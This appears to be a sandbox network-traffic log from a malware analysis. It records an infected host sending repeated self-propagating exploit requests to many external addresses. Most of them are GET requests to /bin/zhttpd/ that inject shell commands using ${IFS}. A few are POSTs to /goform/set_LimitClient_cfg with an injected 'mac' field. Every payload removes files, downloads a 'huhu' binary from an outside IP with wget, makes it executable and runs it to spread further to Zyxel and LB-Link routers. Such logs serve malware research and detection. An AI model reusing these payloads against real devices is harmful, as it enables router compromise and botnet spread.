                                                Jan 29, 2024 07:07:34.026716948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                971192.168.2.2346306132.125.132.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026770115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                972192.168.2.2350566130.191.198.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026798964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                973192.168.2.2336944213.240.88.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026834965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                974192.168.2.235700465.38.110.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026881933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                975192.168.2.233491871.60.188.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026921988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                976192.168.2.2348040161.18.241.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.026957989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                977192.168.2.235527457.202.93.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.033754110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                978192.168.2.2344678108.249.154.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.033791065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                979192.168.2.233698078.124.71.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.033843040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                980192.168.2.23590964.179.246.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.033860922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                981192.168.2.234200013.207.233.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.033869982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                982192.168.2.2343164118.18.107.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.033921003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                983192.168.2.233924062.171.13.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.033961058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                984192.168.2.2355030155.183.156.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.034003973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                985192.168.2.2352856136.125.197.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.034034967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                986192.168.2.2353304139.176.248.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.034079075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                987192.168.2.234217217.63.80.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.034113884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                988192.168.2.233504880.116.235.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.034163952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                989192.168.2.235218813.115.253.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.034194946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                990192.168.2.233286088.204.197.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.034245014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                991192.168.2.2343680139.39.246.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.034295082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                992192.168.2.2340712210.215.123.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.034337044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                993192.168.2.2333582162.159.247.1638080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.982695103 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:35.106281996 CET328INHTTP/1.1 400 Bad Request
                                                Server: cloudflare
                                                Date: Mon, 29 Jan 2024 06:07:35 GMT
                                                Content-Type: text/html
                                                Content-Length: 155
                                                Connection: close
                                                CF-RAY: -
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                994192.168.2.2358454154.28.133.678080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:34.983805895 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:07:35.110054970 CET1286INHTTP/1.1 400 Bad Request
                                                Server: squid/3.5.20
                                                Mime-Version: 1.0
                                                Date: Mon, 29 Jan 2024 06:04:03 GMT
                                                Content-Type: text/html;charset=utf-8
                                                Content-Length: 3468
                                                X-Squid-Error: ERR_INVALID_URL 0
                                                Connection: close
                                                Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 6e 61 6c 2d 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 53 4e 2e 70 6e 67 27 29 20
                                                Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-internal-static/icons/SN.png')


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                995192.168.2.2335656195.205.79.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.046459913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                996192.168.2.233564894.76.119.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.046504021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                997192.168.2.2338850188.11.17.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.046544075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                998192.168.2.2351468199.144.115.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.046581984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                999192.168.2.234176072.237.248.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.046600103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1000192.168.2.233616679.199.240.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.046616077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1001192.168.2.2340608146.96.248.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.046693087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1002192.168.2.235660695.149.188.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.046732903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1003192.168.2.2340468125.3.31.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.046772957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1004192.168.2.2349886190.129.182.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.046806097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1005192.168.2.235887843.113.237.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.046833992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1006192.168.2.233411296.117.71.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.046875000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1007192.168.2.234988868.214.232.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.046931028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1008192.168.2.235123466.92.164.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.046963930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1009192.168.2.2356040180.23.159.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047005892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1010192.168.2.2337622142.59.107.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047053099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1011192.168.2.23379984.235.47.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047101021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1012192.168.2.235405873.123.98.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047137022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1013192.168.2.2350432223.15.173.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047161102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1014192.168.2.234044431.181.137.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:35.047219038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1015192.168.2.235986848.229.73.44443
                                                TimestampBytes transferredDirectionData
